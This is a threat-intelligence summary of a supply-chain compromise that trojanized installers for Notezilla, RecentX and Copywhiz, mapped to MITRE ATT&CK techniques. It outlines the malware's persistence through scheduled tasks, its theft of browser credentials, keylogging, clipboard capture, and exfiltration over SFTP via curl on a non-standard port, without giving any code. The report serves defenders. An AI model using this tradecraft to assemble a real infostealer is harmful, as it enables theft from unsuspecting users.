Supply Chain Compromise Results in Trojanized Installers for Notezilla, RecentX, Copywhiz

MITRE Techniques

• [T1584.004] Compromise Infrastructure – The threat actor gained access to the official domain responsible for serving software downloads. “The threat actor gained access to the official domain responsible for serving software downloads.”
• [T1195.002] Supply Chain Compromise: Compromise Software Supply Chain – The threat actor trojanized copies of the legitimate installers being served on the official website, to execute malware. “trojanized copies of the legitimate installers being served on the official website, to execute malware.”
• [T1204.002] User Execution: Malicious File – Users are tricked into executing the malicious installer as it is served from the official website. “Users are tricked into executing the malicious installer as it is served from the official website.”
• [T1059.003] Command and Scripting Interpreter: Windows Command Shell – Much of the malware’s functionality is facilitated through batch script files. “Much of the malware’s functionality is facilitated through batch script files.”
• [T1059.006] Command and Scripting Interpreter: Python – Several second stage payloads were created using PyInstaller. “Several second stage payloads were created using PyInstaller.”
• [T1053.005] Scheduled Task/Job: Scheduled Task – Initial execution of the primary batch script is delayed by at least 3 hours by the creation of a scheduled task. “Initial execution of the primary batch script is delayed by at least 3 hours by the creation of a scheduled task.”
• [T1053.005] Scheduled Task/Job: Scheduled Task – The malware is executed every 3 hours and will persist through reboots. “The malware is executed every 3 hours and will persist through reboots.”
• [T1555.003] Credentials from Web Browsers: Credentials from Web Browsers – The malware decrypts and dumps credentials from Google Chrome and Mozilla Firefox. “The malware decrypts and dumps credentials from Google Chrome and Mozilla Firefox.”
• [T1560.001] Archive Collected Data: Archive via Utility – Stolen data is archived via 7z.exe. “Stolen data is archived via 7z.exe.”
• [T1115] Clipboard Data – A second stage malware payload dumps all clipboard data to disk. “Clipboard data”
• [T1005] Data from Local System – The malware compresses and steals files according to a file extension list and directory path strings blacklist. “compresses and steals files according to a file extension list and directory path strings blacklist.”
• [T1056.001] Input Capture: Keylogging – A second stage malware payload logs keystrokes to disk. “logs keystrokes to disk.”
• [T1571] Non-Standard Port – The threat actor uses port 2265 for SFTP instead of the default: 22. “uses port 2265 for SFTP instead of the default: 22.”
• [T1048] Exfiltration Over Alternative Protocol – The malware uploads stolen data to C2 servers using SFTP via curl. “uploads stolen data to C2 servers using SFTP via curl.”